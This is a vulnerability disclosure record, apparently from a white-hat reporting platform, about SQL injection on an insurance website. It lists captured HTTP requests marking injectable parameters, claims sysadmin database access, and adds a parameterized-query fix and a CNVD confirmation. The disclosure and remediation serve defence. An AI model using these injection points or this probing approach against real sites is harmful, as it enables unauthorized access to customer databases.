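2015-12-05: Details reported to the vendor; awaiting vendor handling
2015-12-09: Vendor confirmed; details disclosed only to the vendor
2015-12-19: Details disclosed to core white hats and experts in related fields
2015-12-29: Details disclosed to regular white hats
2016-01-08: Details disclosed to intern white hats
2016-01-21: Details disclosed to the public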
SQL injection bundle
http://**.**.**.**/whoarewe_mapfre.html
Injection point 1#
POST /insure_ot_order_form.aspx HTTP/1.1
Content-Length: 77
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: .ASPXANONYMOUS=nwUxxjFk0QEkAAAAMWFhYjkzMmQtOTY2ZS00ZTgxLTlmMjItODE0NTJkMmQ0MTMyuQtdY7iBso4duHETSvyPY6UEyIg1; homevalidatecode=2195
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

key=CJType&otype=getenumitems
sa privileges, 43 databases
sql-2# This point has quite a few injectable parameters: -p "selCJType,selRelation,selSIDType,selTIDType"
POST /insure_ot_order_confirm.aspx HTTP/1.1
Content-Length: 949
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: .ASPXANONYMOUS=nwUxxjFk0QEkAAAAMWFhYjkzMmQtOTY2ZS00ZTgxLTlmMjItODE0NTJkMmQ0MTMyuQtdY7iBso4duHETSvyPY6UEyIg1; homevalidatecode=2195
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

rdoInsured_1=1&rdoInvoice=0&rdoNeedEsPDF=0&rdoSex=0&rdoTSex=0&selCJType=1&selIDType=1&selProductItems=1&selProductList=c8a4b0a9-2be8-41c0-970a-6b0fac5cba89&selRelation=1&selSIDType=1&selTIDType=z41EvVoN&txtBirtyday=17&txtBnforder=1&txtBnfPortion=1&txtCustomerId=&txtDestCountryCode=&txtDestCountryName=dqnbnjvh&txtEmail=sample%40email.tst&txtEName=dqnbnjvh&txtEndTime=1&txtESName=dqnbnjvh&txtETName=dqnbnjvh&txtGetStartDate=01/01/1967&txtIDNo=1&txtIDType=&txtInvoiceAddress=3137%20Laguna%20Street&txtInvoiceFee=0.00&txtInvoicePhone=555-666-0606&txtInvoiceRecipient=1&txtInvoiceTitle=Mr.&txtLastRowIndex=1&txtName=dqnbnjvh&txtOtype=submit&txtPassCountry=g00dPa%24%24w0rD&txtPassCountryCode=&txtPassword=g00dPa%24%24w0rD&txtPasswordTwo=g00dPa%24%24w0rD&txtPhone=555-666-0606&txtPrice=1&txtProductItemId=&txtProductItemName=&txtProductName=&txtSIDNo=1&txtSName=dqnbnjvh&txtTBirtyday=17&txtTIDNo=1&txtTName=dqnbnjvh
sql-3#
POST /search.aspx HTTP/1.1
Content-Length: 58
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: .ASPXANONYMOUS=nwUxxjFk0QEkAAAAMWFhYjkzMmQtOTY2ZS00ZTgxLTlmMjItODE0NTJkMmQ0MTMyuQtdY7iBso4duHETSvyPY6UEyIg1; homevalidatecode=2195
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

searchtext=jEw85wr2
Parameterized queries
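The recommended fix applied to the three reported inputs, as an added example that is not the vendor's code or part of the original report: each input is allowlisted or type-checked and then passed as a bound parameter. SQLite stands in for the site's SQL Server backend, and the table names, column names and allowlist are assumptions.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in; the real schema is not shown on the page."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE enum_items (enum_key TEXT, item_id INTEGER, label TEXT);
        INSERT INTO enum_items VALUES
            ('CJType', 1, 'Type A'), ('CJType', 2, 'Type B'), ('Relation', 1, 'Self');
        CREATE TABLE articles (title TEXT);
        INSERT INTO articles VALUES
            ('Travel cover'), ('O''Brien family plan'), ('100% refund');
    """)
    return db

# Assumed allowlist, derived from the parameter names in the captured requests.
ALLOWED_ENUM_KEYS = {"CJType", "Relation", "SIDType", "TIDType"}

def get_enum_items(db, key):
    """key=...&otype=getenumitems: allowlist the key, then bind it as a value."""
    if key not in ALLOWED_ENUM_KEYS:
        raise ValueError("unknown enum key")
    cur = db.execute(
        "SELECT item_id, label FROM enum_items WHERE enum_key = ? ORDER BY item_id",
        (key,),
    )
    return cur.fetchall()

def parse_type_id(raw):
    """selCJType, selRelation, selSIDType, selTIDType: accept small integers only."""
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 4):
        raise ValueError("type id must be numeric")
    return int(raw)

def search(db, text):
    """searchtext: bound parameter, with LIKE wildcards escaped to match literally."""
    esc = text.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    cur = db.execute(
        "SELECT title FROM articles WHERE title LIKE ? ESCAPE '\\' ORDER BY title",
        (f"%{esc}%",),
    )
    return [row[0] for row in cur]
```

With this handling, the non-numeric `selTIDType=z41EvVoN` value from the second captured request is rejected before any query is built, and a search term containing a quote or `%` is matched as literal text.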
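Severity: High
Vulnerability Rank: 10
Confirmation time: 2015-12-09 17:37
CNVD has confirmed and reproduced the situation described, and has passed it to CNCERT to notify the competent department for insurance-industry informatization, which will follow up by coordinating with the website's managing organization to handle it.
None yet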